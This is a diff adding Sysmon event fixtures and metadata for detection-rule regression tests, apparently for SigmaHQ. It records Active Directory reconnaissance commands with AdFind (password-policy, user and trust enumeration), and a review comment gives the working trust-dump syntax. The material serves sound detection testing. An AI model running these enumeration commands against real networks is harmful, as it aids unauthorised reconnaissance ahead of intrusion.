@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:09:41.570583Z" + } + }, + "EventRecordID": 33638020, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:09:41.563", + "ProcessGuid": "5AA13A44-B845-68FE-3702-000000004102", + "ProcessId": 9004, + "Image": "C:\\Windows\\System32\\gpresult.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "Query Group Policy RSOP Data", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "gprslt.exe", + "CommandLine": "gpresult /z", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=84DBEACB152615177EB5EE2AC4735B75186BC28F,MD5=80B679C92D709FF93DF2400966A5C183,SHA256=09F58BF0E2D334AAA7410AB613E71F4D1FD346ABEF010423020BD6C3A6C20195,IMPHASH=C853AD8534AC03E7AD69F32A5B0B1625", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml
new file mode 100644
index 000000000..598d7f998
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml
@@ -0,0 +1,12 @@
+id: f0e9da0c-c305-4bcb-89e5-79621d0ba6d2
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: e56d3073-83ff-4021-90fe-c658e0709e72
+ title: Gpresult Display Group Policy Information
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx
new file mode 100644
index 000000000..7dbd24531
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json
new file mode 100644
index 000000000..e56eec8aa
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json
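Review bot: `match_count` is missing from the `regression_tests_info` entry here, unlike every other info.yml in this change (this hunk is 12 lines where the others are 13), and the hh_chm_execution info.yml in the next file section has the same omission. Without it the runner presumably falls back to a weaker "at least one hit" check, so a rule change that makes the sample match twice would go unnoticed; the accompanying dump holds exactly one Sysmon EventID 1 record (`gpresult /z`), so the expectation is known. Adding `match_count: 1` after the `provider` line, as the other fixtures do, keeps the entries uniform and makes the test as strict as its siblings.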
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:11:22.294854Z" + } + }, + "EventRecordID": 33639600, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:11:22.292", + "ProcessGuid": "5AA13A44-B8AA-68FE-3F02-000000004102", + "ProcessId": 7784, + "Image": "C:\\Windows\\hh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft® HTML Help Executable", + "Product": "HTML Help", + "Company": "Microsoft Corporation", + "OriginalFileName": "HH.exe", + "CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Windows\\IME\\IMETC\\HELP\\IMTCTC14.CHM", + "CurrentDirectory": "C:\\Windows\\IME\\IMETC\\HELP\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C", + "ParentProcessGuid": "5AA13A44-B55F-68FE-1A01-000000004102", + "ParentProcessId": 8100, + "ParentImage": "C:\\Program Files\\Everything\\Everything.exe", + "ParentCommandLine": "\"C:\\Program Files\\Everything\\Everything.exe\" -startup", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml
new file mode 100644
index 000000000..67ee105e9
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml
@@ -0,0 +1,12 @@
+id: 627bc1e3-7961-4d77-96df-915627f8c3fc
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84
+ title: HH.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ path: regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx
new file mode 100644
index 000000000..b5128f2c6
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json
new file mode 100644
index 000000000..64e79fdd7
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T09:37:40.974119Z" + } + }, + "EventRecordID": 650014, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 09:37:40.972", + "ProcessGuid": "14207D89-F764-68F9-2410-000000003F02", + "ProcessId": 4316, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02", + "ParentProcessId": 6488, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml
new file mode 100644
index 000000000..94621d03a
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml
@@ -0,0 +1,13 @@
+id: de5c7702-3eb3-41be-ae33-b36a6f13d985
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b
+ title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx
new file mode 100644
index 000000000..474247e01
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json
new file mode 100644
index 000000000..c19f3d63d
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-23T09:30:03.278177Z"
+ }
+ },
+ "EventRecordID": 649847,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3076,
+ "ThreadID": 4936
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "srv-01.midgardnet.tech",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-23 09:30:03.253",
+ "ProcessGuid": "14207D89-F59B-68F9-DB0F-000000003F02",
+ "ProcessId": 6504,
+ "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe",
+ "FileVersion": "1.62.0.6172",
+ "Description": "-",
+ "Product": "AdFind",
+ "Company": "www.joeware.net",
+ "OriginalFileName": "AdFind.exe",
+ "CommandLine": "AdFind.exe -f (objectcategory=person)",
+ "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\",
+ "User": "MIDGARDNET\\SwachchhandaP",
+ "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
+ "LogonId": "0x46940f",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201",
+ "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02",
+ "ParentProcessId": 6488,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "MIDGARDNET\\SwachchhandaP"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml
new file mode 100644
index 000000000..48d10dc7f
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml
@@ -0,0 +1,13 @@
+id: c02bbff9-3d3b-4b4b-a6f5-8c2f4cbb60ad
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 514e7e3e-b3b4-4a67-af60-be20f139198b
+ title: PUA - AdFind.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx
new file mode 100644
index 000000000..da3e6f081
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json
new file mode 100644
index 000000000..ab8d77e62
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-23T11:32:08.872401Z"
+ }
+ },
+ "EventRecordID": 651803,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3076,
+ "ThreadID": 4936
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "srv-01.midgardnet.tech",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-23 11:32:08.871",
+ "ProcessGuid": "14207D89-1238-68FA-4A13-000000003F02",
+ "ProcessId": 8080,
+ "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe",
+ "FileVersion": "1.62.0.6172",
+ "Description": "-",
+ "Product": "AdFind",
+ "Company": "www.joeware.net",
+ "OriginalFileName": "AdFind.exe",
+ "CommandLine": "AdFind.exe -s trustdmp",
+ "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\",
+ "User": "MIDGARDNET\\SwachchhandaP",
+ "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
+ "LogonId": "0x46940f",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201",
+ "ParentProcessGuid": "14207D89-1136-68FA-2D13-000000003F02",
+ "ParentProcessId": 1648,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "MIDGARDNET\\SwachchhandaP"
+ }
+ }
+}
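Review bot: The captured command line `"AdFind.exe -s trustdmp"` is not the invocation the suspicious-usage rule is meant to exercise: in AdFind `-s` sets the search scope (base/one/subtree) and the trust-dump shortcut is `-sc trustdmp`, so this run most likely failed inside AdFind with a scope error while Sysmon still logged the process creation. A rule keyed on the bare `trustdmp` token will still match, so the regression test passes, but the fixture then documents a command no operator or threat actor would issue. Re-recording with `AdFind.exe -sc trustdmp` would make the fixture mirror the tradecraft the rule was written against; I cannot see the rule body here, so check that its match is on the token and not on the literal `-s trustdmp` before replacing the evtx.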
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml
new file mode 100644
index 000000000..69f9d343d
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml
@@ -0,0 +1,13 @@
+id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 9a132afa-654e-11eb-ae93-0242ac130002
+ title: PUA - AdFind Suspicious Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx
new file mode 100644
index 000000000..0996d98ff
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json
new file mode 100644
index 000000000..508e249e2
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:01:48.031627Z" + } + }, + "EventRecordID": 650317, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:01:48.012", + "ProcessGuid": "14207D89-FD0C-68F9-D610-000000003F02", + "ProcessId": 2064, + "Image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe", + "FileVersion": "2.5.4594.1", + "Description": "Advanced IP Scanner", + "Product": "Advanced IP Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_ip_scanner.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe\"", + "CurrentDirectory": "C:\\Program Files (x86)\\Advanced IP Scanner\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0", + "ParentProcessGuid": "14207D89-FCFD-68F9-D010-000000003F02", + "ParentProcessId": 3240, + "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp", + "ParentCommandLine": 
"\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp\" /SL5=\"$E0218,20439558,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..bdf211996 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml @@ -0,0 +1,13 @@ +id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + title: PUA - Advanced IP Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx new file mode 100644 index 000000000..105b6ce24 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json new file mode 100644 index 000000000..50406a429 --- /dev/null 
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:11:05.435406Z" + } + }, + "EventRecordID": 650602, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:11:05.414", + "ProcessGuid": "14207D89-FF39-68F9-1A11-000000003F02", + "ProcessId": 7316, + "Image": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe", + "FileVersion": "-", + "Description": "Advanced Port Scanner", + "Product": "Advanced Port Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_port_scanner.exe", + "CommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe\" /portable \"C:/Users/SwachchhandaP/Downloads/\" /lng en_us", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C", + "ParentProcessGuid": "14207D89-FF2E-68F9-1911-000000003F02", + "ParentProcessId": 3972, + "ParentImage": 
"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp", + "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp\" /SL5=\"$E0634,19769177,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_Port_Scanner_2.5.3869.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml new file mode 100644 index 000000000..2586d9498 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml @@ -0,0 +1,13 @@ +id: 998b5845-1623-4b2f-b9d1-bfc402172d45 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 54773c5f-f1cc-4703-9126-2f797d96a69d + title: PUA - Advanced Port Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx new file mode 100644 index 000000000..1c79d4e63 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json new file mode 100644 index 000000000..66daa3697 --- /dev/null 
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
